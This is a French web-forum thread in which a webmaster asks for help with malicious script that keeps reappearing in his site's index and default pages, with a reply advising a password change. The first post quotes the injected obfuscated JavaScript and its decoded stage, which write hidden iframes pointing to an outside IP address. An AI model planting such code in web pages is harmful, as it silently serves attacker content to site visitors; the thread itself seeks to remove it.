IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

code malicieux qui s'insére dans des pages web


Sujet :

Sécurité

  1. #1
    Membre du Club
    Profil pro
    Inscrit en
    Décembre 2003
    Messages
    145
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Décembre 2003
    Messages : 145
    Points : 44
    Points
    44
    Par défaut code malicieux qui s'insére dans des pages web
    Depuis plusieurs mois je suis en guerre avec un virus dans mes pages web.

    Regulièrement j'ai un script qui s'insére dans mes pages et qui bloque l'affichage des pages en questions.
    Il revient tous les 8 jours environ et s'insére uniquement dans les pages nommées "default" ou "index" quelque soit l'extension : html, htm, asp

    Au fur et à mesure le script grossit, il fait disparaitre mon code html. Si bien , lorsque qu'on appelle la page en question, c'est une page blanche qui s'affiche.
    Régulièrement toutes les semaines je vérifie et je nettoie ce script
    Voici le script en question :

    <script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2
    C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C50%2
    C48%2C49%2C46%2C50%2C51%2C53%2C46%2C50%2C51%2C53%2C46%2C49%2C55%2C52%2C47%2C105%2C11
    0%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2
    C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%
    2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script <

    Suite à un conseil, j'ai remplacé "eval" "par alert" pour décodé ce foutu code. A l'affichage de la page, une fenêtre s'ouvre avec :
    if(!myia){ var i=
    0;while((el=document.getElementsByTagName('iframe')).length){if(
    (el[i].style.display=='none'|| el[i].style.visibility=='hidden'|| (el[i].width<5&&
    el[i].height<5))&& el[i].name!=c1) {el[i].parentNode.removeChild(el[i]);}i++;}
    d.write('<IFRAME name=c1
    src=\'http://0XD1.%30XA0.0X48.%30XA7?'+Math.round(Math.random()*8877)+'87db\'width=33height=269 style=\'display:none\'></Iframe>');
    }var myia=true;

    Bien sur l'adresse correspondant un rien. J'ai rien trouvé comme solution avec l'ami google si ce n'est ça :
    http://lists.virus.org/bugtraq-0304/msg00257.html (en anglais c'est pas mon truc)
    http://www.geckozone.org/forum/viewt...b517c66f370714 (ca me dit pas grand chose
    Mes question :
    Comment un script peut s'incrire dans une page web sans que le webmaster ou les personnes qui gére le serveur soient au courant.?
    comment faire pour éradiquer ce foutu virus ( ou autre chose) ?
    Merci pour votre aide

  2. #2
    Membre émérite
    Avatar de Jean-Philippe Dubé
    Homme Profil pro
    Analyse système
    Inscrit en
    Mai 2006
    Messages
    1 266
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Canada

    Informations professionnelles :
    Activité : Analyse système
    Secteur : Service public

    Informations forums :
    Inscription : Mai 2006
    Messages : 1 266
    Points : 2 641
    Points
    2 641
    Par défaut
    Il y a peut-être quelqu'un (ou un robot) qui a ton mot de passe et qui modifie les pages de ton site. Je ne comprends pas trop moi non plus, mais commence par changer tes mots de passe.

  3. #3
    Membre du Club
    Profil pro
    Inscrit en
    Décembre 2003
    Messages
    145
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Décembre 2003
    Messages : 145
    Points : 44
    Points
    44
    Par défaut
    je vais changer mon pass et je verrai bien . Mais ca fait des mois que ca dure
    je suis ouvert à toutes solutions...

Discussions similaires

  1. Réponses: 2
    Dernier message: 25/06/2008, 13h56
  2. Réponses: 2
    Dernier message: 16/05/2008, 17h51
  3. Protection image dans des pages WEB
    Par Pascal FLEURY dans le forum Langage
    Réponses: 6
    Dernier message: 25/08/2007, 16h12
  4. Comment repérer des bandeaux pub dans des pages web
    Par murfodef dans le forum Balisage (X)HTML et validation W3C
    Réponses: 14
    Dernier message: 06/01/2007, 12h32
  5. [WebForms]Comment repérer des bandeaux pub dans des pages web
    Par murfodef dans le forum Général Dotnet
    Réponses: 6
    Dernier message: 04/01/2007, 14h38

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo